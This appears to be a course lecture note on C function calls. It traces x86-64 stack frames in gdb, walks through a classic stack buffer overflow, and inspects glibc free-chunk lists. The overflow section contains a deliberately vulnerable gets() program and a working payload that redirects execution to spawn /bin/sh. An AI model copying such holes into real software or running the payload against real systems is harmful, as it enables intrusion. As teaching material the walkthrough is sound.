
# [你所不知道的 C 語言: 函式呼叫篇](https://hackmd.io/s/SJ6hRj-zg)

Contributed by < [`dange0`](https://github.com/dange0) >

###### tags: `sysprog2018`

## Function Definition

- In mathematics, a function may take several inputs and maps them to exactly one output.
- Function composition: functions can themselves be combined.
    - $(g \circ f)(x) = g(f(x))$

## How a Process Relates to a C Program

- MMIO (memory-mapped I/O)
    - The address space is shared between memory and I/O devices.
    - I/O devices are accessed directly through addresses mapped into memory.
- Operating System
    - Acts as the bridge between applications and hardware.
- MMU (Memory Management Unit)
    - Translates virtual addresses to physical addresses.
    - Protects resources.
- Address Space Isolation
    - Separates the valid memory ranges of each process and I/O device.
- Symbol
    - Maps a human-readable name to an address.
- Stack
    - Records return addresses, arguments, temporary variables, and context.

## Stack

### Stack Terminology

- rip: the instruction pointer; holds the address of the next instruction to execute.
- rsp: the stack pointer; points to the top of the stack.
- rbp: the base pointer; points to the base of the current stack frame.

![](https://i.imgur.com/S5QUT5I.png)

### Tracing the Stack Dynamically

A small example shows how the stack is manipulated:

```clike=
int funcA(int b){
    return funcB(b);
}
int funcB(int a){
    return a+1 ;
}
int main(){
    int a = funcA(1);
    return 0;
}
```

Compile with `-g` to make the program easier to inspect:

```shell
$ gcc -o stack -g stack.c
```

Open the binary in gdb and disassemble it with `disas`:

```shell=
gdb-peda$ disas main
Dump of assembler code for function main:
   0x0000000000400501 <+0>: push rbp
   0x0000000000400502 <+1>: mov rbp,rsp
   0x0000000000400505 <+4>: sub rsp,0x10
   0x0000000000400509 <+8>: mov edi,0x1
   0x000000000040050e <+13>: call 0x4004d6 <funcA>
   0x0000000000400513 <+18>: mov DWORD PTR [rbp-0x4],eax
   0x0000000000400516 <+21>: mov eax,0x0
   0x000000000040051b <+26>: leave
   0x000000000040051c <+27>: ret
End of assembler dump.
gdb-peda$ disas funcA
Dump of assembler code for function funcA:
   0x00000000004004d6 <+0>: push rbp
   0x00000000004004d7 <+1>: mov rbp,rsp
   0x00000000004004da <+4>: sub rsp,0x10
   0x00000000004004de <+8>: mov DWORD PTR [rbp-0x4],edi
   0x00000000004004e1 <+11>: mov eax,DWORD PTR [rbp-0x4]
   0x00000000004004e4 <+14>: mov edi,eax
   0x00000000004004e6 <+16>: mov eax,0x0
   0x00000000004004eb <+21>: call 0x4004f2 <funcB>
   0x00000000004004f0 <+26>: leave
   0x00000000004004f1 <+27>: ret
End of assembler dump.
gdb-peda$ disas funcB
Dump of assembler code for function funcB:
   0x00000000004004f2 <+0>: push rbp
   0x00000000004004f3 <+1>: mov rbp,rsp
   0x00000000004004f6 <+4>: mov DWORD PTR [rbp-0x4],edi
   0x00000000004004f9 <+7>: mov eax,DWORD PTR [rbp-0x4]
   0x00000000004004fc <+10>: add eax,0x1
   0x00000000004004ff <+13>: pop rbp
   0x0000000000400500 <+14>: ret
End of assembler dump.
```

The assembly here is shown in Intel syntax rather than AT&T syntax; for the differences, see [Intel and AT&T Syntax.](https://imada.sdu.dk/Employees/kslarsen-bak/Courses/dm18-2007-spring/Litteratur/IntelnATT.htm)

Since the goal is to watch what happens to the stack on function entry, set the breakpoint just before entering funcA(), at the `call` instruction on line 7 of the listing above.

```shell
gdb-peda$ b *0x000000000040050e
Breakpoint 1 at 0x4004ec: file stack.c, line 6.
gdb-peda$ r
```

```shell
gdb-peda$ p $rbp
$1 = (void *) 0x7fffffffe480
gdb-peda$ p $rsp
$2 = (void *) 0x7fffffffe470
```

At this point the stack looks like this:

![](https://i.imgur.com/V7MJUpb.png =400x)

When `call funcA` executes, the `call` instruction pushes the address of the next instruction, which is the return address back into main.

> call funcA
>![](https://i.imgur.com/kO1gVlK.png =400x)

Execution then enters funcA(), whose instructions are:

```shell
Dump of assembler code for function funcA:
   0x00000000004004d6 <+0>: push rbp
   0x00000000004004d7 <+1>: mov rbp,rsp
   0x00000000004004da <+4>: sub rsp,0x10
   0x00000000004004de <+8>: mov DWORD PTR [rbp-0x4],edi
   0x00000000004004e1 <+11>: mov eax,DWORD PTR [rbp-0x4]
   0x00000000004004e4 <+14>: mov edi,eax
   0x00000000004004e6 <+16>: mov eax,0x0
   0x00000000004004eb <+21>: call 0x4004f2 <funcB>
   0x00000000004004f0 <+26>: leave
   0x00000000004004f1 <+27>: ret
End of assembler dump.
```

>push rbp
>![](https://i.imgur.com/vQDaJW8.png =400x)

>mov rbp,rsp
>![](https://i.imgur.com/Os3TyG0.png =400x)

>sub rsp,0x10
>![](https://i.imgur.com/EdzoTsU.png =400x)

At this point funcA's stack frame is essentially complete. When the function returns, funcA executes `leave`, which is equivalent to:

```
mov rsp, rbp
pop rbp
```

> mov rsp, rbp
> ![](https://i.imgur.com/i2bu0fR.png =400x)

> pop rbp
> ![](https://i.imgur.com/WbNusOO.png =400x)

Now rsp points at the return address into main. When `ret` executes, it pops that address into rip, and the stack is back in the state of main's stack frame.

> ret
> ![](https://i.imgur.com/3ewDJv8.png =400x)

:::info
Comparing funcA with funcB: funcA has `sub rsp, 0x10` on line 5, but funcB does not. The inference here is that the compiler knows at compile time that funcB calls no other function and does not use the stack any further after its prologue, so `rsp` does not need to be moved to reserve space for funcB. This is consistent with the red zone defined by the System V AMD64 ABI: a leaf function may use the 128 bytes below `rsp` without adjusting it.

```shell=
gdb-peda$ disas funcA
Dump of assembler code for function funcA:
   0x00000000004004d6 <+0>: push rbp
   0x00000000004004d7 <+1>: mov rbp,rsp
   0x00000000004004da <+4>: sub rsp,0x10
   0x00000000004004de <+8>: mov DWORD PTR [rbp-0x4],edi
   0x00000000004004e1 <+11>: mov eax,DWORD PTR [rbp-0x4]
   0x00000000004004e4 <+14>: mov edi,eax
   0x00000000004004e6 <+16>: mov eax,0x0
   0x00000000004004eb <+21>: call 0x4004f2 <funcB>
   0x00000000004004f0 <+26>: leave
   0x00000000004004f1 <+27>: ret
End of assembler dump.
gdb-peda$ disas funcB
Dump of assembler code for function funcB:
   0x00000000004004f2 <+0>: push rbp
   0x00000000004004f3 <+1>: mov rbp,rsp
   0x00000000004004f6 <+4>: mov DWORD PTR [rbp-0x4],edi
   0x00000000004004f9 <+7>: mov eax,DWORD PTR [rbp-0x4]
   0x00000000004004fc <+10>: add eax,0x1
   0x00000000004004ff <+13>: pop rbp
   0x0000000000400500 <+14>: ret
End of assembler dump.
```
:::

:::warning
Question: :question: In the [lecture video at 1h26m41s](https://youtu.be/X5hOAFCxOTA?t=1h26m41s), the instructor says that the return address at `0x7fffffffdde8` is used to find the location of the previous stack frame, `0x7fffffffde08`. My understanding, however, is that the location of a stack frame is tracked through the **old rbp**: `push rbp` records the caller's stack frame, and `pop rbp` restores the previous stack frame. The **return address** should only record the address to return to in the caller. Is this understanding wrong?

The extent of a stack frame is defined in the [System V Application Binary Interface AMD64 Architecture Processor Supplement](https://github.com/hjl-tools/x86-psABI/wiki/x86-64-psABI-1.0.pdf) as:

![](https://i.imgur.com/Fec7Vyx.png)
:::

### Buffer Overflow - Baby Jump

bof.c

```clike=
int evil(){
    system("/bin/sh");
}

int main(){
    char input[10];
    puts("Input:");
    gets(input);
    puts(input);
}
```

This program demonstrates how the most basic buffer overflow attack works. Line 8 shows that the victim uses `gets()`, a function with no length check. The program also contains a function that executes `/bin/sh`. A user cannot legitimately call it in normal operation, but a buffer overflow can change the control flow and trigger this dangerous function.

First, compile the program. Note that `-fno-stack-protector` is required to turn off the stack canary, a memory protection mechanism; the related protection mechanisms are introduced briefly later.

```shell
$ gcc -o bof -fno-stack-protector -g bof.c
```

Next, observe how the program behaves. It is very simple: it prints your input back verbatim. Let us see what such a simple program is hiding.

```shell
$ ./bof
Input:
abc
abc
```

#### Why Segmentation fault?

Now try something brutal: stuff the program with a string longer than the buffer.

```shell
$ gdb -q bof
gdb-peda$ r
Input:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Program received signal SIGSEGV, Segmentation fault.
```

As expected, the program crashes and reports `Segmentation fault`. This is worth a closer look. Start with Wikipedia's explanation of `Segmentation fault`:

:::info
A segmentation fault (often shortened to segfault), also known as an access violation, is a kind of program error. It occurs when a program attempts to access a region of memory that the CPU cannot address.
:::

Why would feeding in too much input have anything to do with an illegal memory access? GDB reveals what is going on.

```shell
gdb-peda$ x/16g input
0x7fffffffe470: 0x6161616161616161 0x6161616161616161
0x7fffffffe480: 0x6161616161616161 0x6161616161616161
0x7fffffffe490: 0x6161616161616161 0x6161616161616161
0x7fffffffe4a0: 0x6161616161616161 0x6161616161616161
0x7fffffffe4b0: 0x6161616161616161 0x0061616161616161
0x7fffffffe4c0: 0x00000000004004c0 0x00007fffffffe560
0x7fffffffe4d0: 0x0000000000000000 0x0000000000000000
0x7fffffffe4e0: 0x06fe5dce4008e824 0x06fe4d7426f8e824
```

Memory is filled with `0x61`, the `a` characters we just typed. As the stack introduction above noted, local variables are stored on the stack, so the local variable `input` lives in main's stack frame. The function's `return address` sits at the high-address end of that frame, just above the saved `rbp`, so we can suspect that the `a`s overwrote the `return address` and sent `rip` somewhere that cannot be accessed. Set a breakpoint at `main+53` and look at what `rsp` points to next, which is the value in the `return address` slot.

```shell
gdb-peda$ pd main
Dump of assembler code for function main:
   0x00000000004005cc <+0>: push rbp
   0x00000000004005cd <+1>: mov rbp,rsp
   0x00000000004005d0 <+4>: sub rsp,0x10
   0x00000000004005d4 <+8>: mov edi,0x40069c
   0x00000000004005d9 <+13>: call 0x400470 <puts@plt>
   0x00000000004005de <+18>: lea rax,[rbp-0x10]
   0x00000000004005e2 <+22>: mov rdi,rax
   0x00000000004005e5 <+25>: mov eax,0x0
   0x00000000004005ea <+30>: call 0x4004a0 <gets@plt>
   0x00000000004005ef <+35>: lea rax,[rbp-0x10]
   0x00000000004005f3 <+39>: mov rdi,rax
   0x00000000004005f6 <+42>: call 0x400470 <puts@plt>
   0x00000000004005fb <+47>: mov eax,0x0
   0x0000000000400600 <+52>: leave
=> 0x0000000000400601 <+53>: ret
End of assembler dump.
gdb-peda$ b *0x0000000000400601
Breakpoint 1 at 0x400601: file bof.c, line 10.
gdb-peda$ c
Continuing.
gdb-peda$ p $rsp
$7 = (void *) 0x7fffffffe488
gdb-peda$ x/g 0x7fffffffe488
0x7fffffffe488: 0x6161616161616161
```

The `return address` slot now holds 0x6161616161616161.

```shell
gdb-peda$ vmmap
Start End Perm Name
0x00400000 0x00401000 r-xp /tmp/bof
0x00600000 0x00601000 r--p /tmp/bof
0x00601000 0x00602000 rw-p /tmp/bof
0x00602000 0x00623000 rw-p [heap]
0x00007ffff7a0d000 0x00007ffff7bcd000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7bcd000 0x00007ffff7dcd000 ---p /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dcd000 0x00007ffff7dd1000 r--p /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd1000 0x00007ffff7dd3000 rw-p /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd3000 0x00007ffff7dd7000 rw-p mapped
0x00007ffff7dd7000 0x00007ffff7dfd000 r-xp /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7fea000 0x00007ffff7fed000 rw-p mapped
0x00007ffff7ff8000 0x00007ffff7ffa000 r--p [vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp [vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p [stack]
0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall]
```

`vmmap` shows that `0x6161616161616161` is not inside any range the program is allowed to access, which is why `Segmentation fault` is raised. We can infer that after `gets(input)` memory looks like this:

![](https://i.imgur.com/qeuZwPx.png =400x)

#### Return to evil()

Since we can steer `rip` to `0x6161616161616161` and make the program crash, why not steer it to evil() instead?

```shell
gdb-peda$ p evil
$15 = {int ()} 0x4005b6 <evil>
```

x86-64 stores values in memory in `little endian` byte order, so 0x4005b6 must first be written in little endian form: `\xb6\x05@\x00\x00\x00\x00\x00` (the byte 0x40 is ASCII `@`). What is still missing is the offset to the return address, which can be worked out back in GDB. To make counting easy, the input here is the alphabet typed in sequence, abc...xyz.

```shell
gdb-peda$ r
Input:
abcdefghijklmnopqsttuvwxyzabcdefghijklmnop
abcdefghijklmnopqsttuvwxyzabcdefghijklmnop

Program received signal SIGSEGV, Segmentation fault.
gdb-peda$ p $rsp
$3 = (void *) 0x7fffffffe488
gdb-peda$ x/s 0x7fffffffe488
0x7fffffffe488: "yzabcdefghijklmnop"
```

The first character at $rsp is `y`, and 24 letters precede `y` in the input, so 24 bytes of padding are needed before the return address is reached. This agrees with the addresses seen earlier: 0x7fffffffe488 - 0x7fffffffe470 = 0x18 = 24. With this information we can write the following exploit, which successfully executes `/bin/sh`:

```
$ echo -ne "aaaaaaaaaaaaaaaaaaaaaaaa\xb6\x05@\x00\x00\x00\x00\x00" > payload
$ cat payload - | ./bof
Input:
aaaaaaaaaaaaaaaaaaaaaaaa▒@
whoami
ubuntu
pwd
/tmp
```

The resulting stack layout is:

![](https://i.imgur.com/y5qUs7Y.png =400x)

## Heap

- malloc alignment
    - To keep the implementation fast, the allocator hands out slightly more memory than requested so that chunks stay aligned.
    - This is why free() does not let the caller specify a size; otherwise the extra bytes that were allocated would not be released.

### How is a double free detected?

```clike=
#include <stdlib.h>
int main() {
    int *a = (int *) malloc(100);
    free(a);
    int *b = (int *) malloc(100);
    free(b);
    return 0;
}
```

Using GDB, inspect the result of `int *a = (int *) malloc(100);`:

```shell
gdb-peda$ p a
$3 = (int *) 0x602010
```

Then inspect the result of `int *b = (int *) malloc(100);`:

```shell
gdb-peda$ p b
$4 = (int *) 0x602010
```

This shows that, for performance, free does not immediately hand a chunk obtained from malloc back to the system. The chunks are managed collectively instead, and the next time the program mallocs a chunk of the same size, the previously allocated space is given straight to the caller. So where do the freed chunks go?

```clike
#include <stdlib.h>
int main() {
    int *a = (int *) malloc(50);
    int *b = (int *) malloc(50);
    int *c = (int *) malloc(50);
    int *d = (int *) malloc(50);
    int *e = (int *) malloc(50);
    free(a);
    free(b);
    free(c);
    free(d);
    free(e);
    return 0;
}
```

With a breakpoint before the first free:

```shell
gdb-peda$ p a
$11 = (int *) 0x602010
gdb-peda$ p b
$12 = (int *) 0x602050
gdb-peda$ p c
$13 = (int *) 0x602090
gdb-peda$ p d
$14 = (int *) 0x6020d0
gdb-peda$ p e
$15 = (int *) 0x602110
gdb-peda$ x/50gx 0x602000
0x602000: 0x0000000000000000 0x0000000000000041
0x602010: 0x0000000000000000 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000041
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000041
0x602090: 0x0000000000000000 0x0000000000000000
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000041
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000041
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000000000
0x602130: 0x0000000000000000 0x0000000000000000
0x602140: 0x0000000000000000 0x0000000000020ec1
0x602150: 0x0000000000000000 0x0000000000000000
0x602160: 0x0000000000000000 0x0000000000000000
0x602170: 0x0000000000000000 0x0000000000000000
0x602180: 0x0000000000000000 0x0000000000000000
```

With a breakpoint before return:

```shell
gdb-peda$ x/50gx 0x602000
0x602000: 0x0000000000000000 0x0000000000000041 <- chunk a free
0x602010: 0x0000000000000000 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000041 <- chunk b free
0x602050: [0x0000000000602000] 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000041 <- chunk c free
0x602090: [0x0000000000602040] 0x0000000000000000
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000041 <- chunk d free
0x6020d0: [0x0000000000602080] 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000041 <- chunk e free
0x602110: [0x00000000006020c0] 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000000000
0x602130: 0x0000000000000000 0x0000000000000000
0x602140: 0x0000000000000000 0x0000000000020ec1 <- top chunk
0x602150: 0x0000000000000000 0x0000000000000000
0x602160: 0x0000000000000000 0x0000000000000000
0x602170: 0x0000000000000000 0x0000000000000000
0x602180: 0x0000000000000000 0x0000000000000000
```

- The values enclosed in `[ ]` are the addresses that chain the linked list together: each freed chunk points to the chunk that was freed just before it.
- The `0x41` in each chunk header is the chunk size 0x40 with the low `PREV_INUSE` flag bit set.
- To make freed chunks easier to manage, glibc groups chunks of certain sizes together. The grouping mechanisms include `fast bin`, `small bin`, `large bin`, and others.
    - [Bins and Chunks](https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/bins_chunks.html)

From this, the inference is that double free detection works by checking whether the chunk being freed already belongs to one of these managed groups.
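To make the inference about double free detection concrete, here is a minimal sketch of a single bin modeled as a LIFO singly linked list, the same shape as the bracketed pointers in the dump. All names (`toy_chunk`, `toy_bin`, `toy_free`, `toy_malloc`) are hypothetical and this is not glibc's code. As far as I know, the fast bin path in glibc 2.23 performs a comparable check only against the head of the bin (reported as "double free or corruption (fasttop)"), so the sketch assumes that behavior rather than a scan of the whole bin.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified model of one bin of freed chunks.
 * This is an illustration only, not glibc's data layout. */
struct toy_chunk {
    struct toy_chunk *fd;    /* next free chunk in the bin (the [ ] values) */
};

struct toy_bin {
    struct toy_chunk *head;  /* most recently freed chunk */
};

/* Push a chunk onto the bin.
 * Returns 0 on success, -1 if the chunk is already the head of the bin,
 * i.e. the same chunk was freed twice in a row. */
int toy_free(struct toy_bin *bin, struct toy_chunk *c)
{
    assert(bin != NULL && c != NULL);
    if (bin->head == c)
        return -1;           /* double free detected */
    c->fd = bin->head;       /* link to the previously freed chunk */
    bin->head = c;
    return 0;
}

/* Pop the most recently freed chunk, or return NULL if the bin is empty. */
struct toy_chunk *toy_malloc(struct toy_bin *bin)
{
    assert(bin != NULL);
    struct toy_chunk *c = bin->head;
    if (c != NULL)
        bin->head = c->fd;   /* the next allocation reuses the older chunk */
    return c;
}
```

Freeing `a` and then `b` leaves `b.fd == &a`, matching the dump where chunk b holds the address of chunk a, and `toy_malloc` hands back the most recently freed chunk first, which is why `b` received the same address as `a` in the first experiment. A check limited to the head of the bin does not catch a sequence such as free(a); free(b); free(a).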